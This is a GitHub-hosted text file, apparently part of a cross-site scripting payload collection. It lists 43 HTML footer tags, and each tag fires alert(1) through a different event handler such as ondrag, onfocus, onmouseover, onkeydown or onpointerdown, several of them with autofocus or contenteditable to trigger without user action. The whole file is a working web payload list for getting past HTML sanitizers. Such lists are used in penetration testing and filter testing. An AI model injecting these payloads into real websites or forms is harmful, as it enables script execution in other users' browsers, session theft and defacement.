-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathfooter.txt
43 lines (43 loc) · 2.29 KB
/
footer.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<footer draggable="true" ondrag="alert(1)">test</footer>
<footer draggable="true" ondragend="alert(1)">test</footer>
<footer draggable="true" ondragenter="alert(1)">test</footer>
<footer draggable="true" ondragleave="alert(1)">test</footer>
<footer draggable="true" ondragstart="alert(1)">test</footer>
<footer id=x tabindex=1 onactivate=alert(1)></footer>
<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer>
<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus>
<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus>
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<footer id=x tabindex=1 onfocusin=alert(1)></footer>
<footer onafterscriptexecute=alert(1)><script>1</script>
<footer onbeforecopy="alert(1)" contenteditable>test</footer>
<footer onbeforecut="alert(1)" contenteditable>test</footer>
<footer onbeforepaste="alert(1)" contenteditable>test</footer>
<footer onbeforescriptexecute=alert(1)><script>1</script>
<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus>
<footer onclick="alert(1)">test</footer>
<footer oncontextmenu="alert(1)">test</footer>
<footer oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<footer oncut=alert(1) value="XSS" autofocus tabindex=1>test
<footer ondblclick="alert(1)" autofocus tabindex=1>test</footer>
<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus>
<footer onkeydown="alert(1)" contenteditable>test</footer>
<footer onkeypress="alert(1)" contenteditable>test</footer>
<footer onkeyup="alert(1)" contenteditable>test</footer>
<footer onmousedown="alert(1)">test</footer>
<footer onmouseenter="alert(1)">test</footer>
<footer onmouseleave="alert(1)">test</footer>
<footer onmousemove="alert(1)">test</footer>
<footer onmouseout="alert(1)">test</footer>
<footer onmouseover="alert(1)">test</footer>
<footer onmouseup="alert(1)">test</footer>
<footer onmousewheel=alert(1)>requires scrolling
<footer onpaste="alert(1)" contenteditable>test</footer>
<footer onpointerdown=alert(1)>XSS</footer>
<footer onpointerenter=alert(1)>XSS</footer>
<footer onpointerleave=alert(1)>XSS</footer>
<footer onpointermove=alert(1)>XSS</footer>
<footer onpointerout=alert(1)>XSS</footer>
<footer onpointerover=alert(1)>XSS</footer>
<footer onpointerrawupdate=alert(1)>XSS</footer>
<footer onpointerup=alert(1)>XSS</footer>